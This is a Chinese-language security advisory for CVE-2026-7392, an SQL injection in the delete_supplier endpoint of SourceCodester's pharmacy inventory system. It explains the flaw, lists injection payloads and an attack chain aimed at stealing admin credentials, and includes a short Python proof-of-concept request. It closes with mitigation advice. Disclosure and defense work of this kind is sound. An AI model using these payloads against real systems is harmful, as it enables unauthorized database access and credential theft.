CVE-2026-7392 CVSS 6.3 中危

CVE-2026-7392 SourceCodester药房系统SQL注入漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7392

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pharmacy Sales and Inventory System

漏洞概述

SourceCodester Pharmacy Sales and Inventory System 1.0版本被发现存在安全漏洞。该漏洞位于/ajax.php文件的delete_supplier函数中，由于未能正确过滤用户输入的ID参数，导致攻击者可以构造恶意SQL语句进行注入攻击。攻击者无需用户交互即可远程利用此漏洞，可能造成数据库信息泄露、数据篡改或系统服务中断。

技术细节

该漏洞的核心原理在于典型的SQL注入。在受影响的应用程序中，/ajax.php?action=delete_supplier接口接收用户提交的ID参数，并将其直接拼接到SQL查询语句中，未使用预编译语句或进行有效的输入过滤。当攻击者发送包含特殊SQL字符（如单引号、注释符等）的请求时，原本的数据查询逻辑会被改变。例如，攻击者可以通过构造 ' OR 1=1-- 等 payload 绕过条件判断，或者利用 UNION SELECT 查询获取其他表中的敏感数据（如管理员账号密码）。由于CVSS向量显示攻击复杂度低（AC:L）且无需权限（PR:L）或交互（UI:N），该漏洞极易被自动化工具扫描并利用。

攻击链分析

STEP 1

侦察

攻击者使用扫描工具或手动访问发现目标站点运行SourceCodester Pharmacy Sales and Inventory System 1.0。

STEP 2

漏洞识别

攻击者分析/ajax.php接口，重点关注delete_supplier动作，测试ID参数是否存在SQL注入点。

STEP 3

漏洞利用

攻击者构造包含恶意SQL代码的HTTP请求发送至服务器，试图提取、修改或删除数据库中的数据。

STEP 4

达成目标

成功获取敏感信息（如用户凭证），提升权限，或破坏数据库完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL endpoint
url = "http://target-site.com/ajax.php"

# Vulnerable parameters
# The 'ID' parameter is not sanitized, leading to SQL injection
payload = {
    "action": "delete_supplier",
    "ID": "1' OR '1'='1" # Simple PoC to test logical injection
}

try:
    # Sending malicious request
    response = requests.get(url, params=payload)
    
    # Check if the response indicates successful injection or database error
    if response.status_code == 200:
        print("Request sent successfully.")
        print(f"Response: {response.text[:200]}...")
    else:
        print(f"Status code: {response.status_code}")
        
except Exception as e:
    print(f"An error occurred: {e}")

影响范围

SourceCodester Pharmacy Sales and Inventory System 1.0

防御指南

临时缓解措施

建议立即停止将受影响版本暴露在公网，或在服务器端对传入的ID参数实施强制的正则表达式校验（例如限制仅允许数字）。同时，应限制数据库账户的权限，避免使用Web应用直接连接数据库的高权限账户。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7392
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7392
3 Details https://www.cvedetails.com/cve/CVE-2026-7392/
4 VulDB https://vuldb.com/cve/CVE-2026-7392
5 Link https://github.com/microwaveabi/vul/issues/2
6 Link https://vuldb.com/submit/803107
7 Link https://vuldb.com/vuln/360117
8 Link https://vuldb.com/vuln/360117/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表